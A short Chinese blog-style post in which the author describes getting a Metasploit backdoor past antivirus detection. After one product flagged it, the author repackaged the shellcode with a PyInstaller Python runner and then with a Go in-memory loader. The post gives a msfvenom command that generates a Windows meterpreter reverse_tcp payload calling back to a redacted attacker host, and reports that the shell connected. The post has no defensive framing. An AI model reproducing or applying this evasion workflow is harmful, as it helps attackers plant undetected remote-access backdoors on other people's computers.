昨天朋友通知我的 msf后门被智量杀毒软件查杀了。
360 、 火绒都还没杀到。
我一听,很闹心。
于是使用pyintaller去打包了一个python shellcode运行程序。
免杀了。
有朋友说试试golang来做shellcode loader
恩,本地配置一下环境。编译生成。
msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=xxx LPORT=xxx
成功上线。
还是这种内存加载shellcode的方式安稳。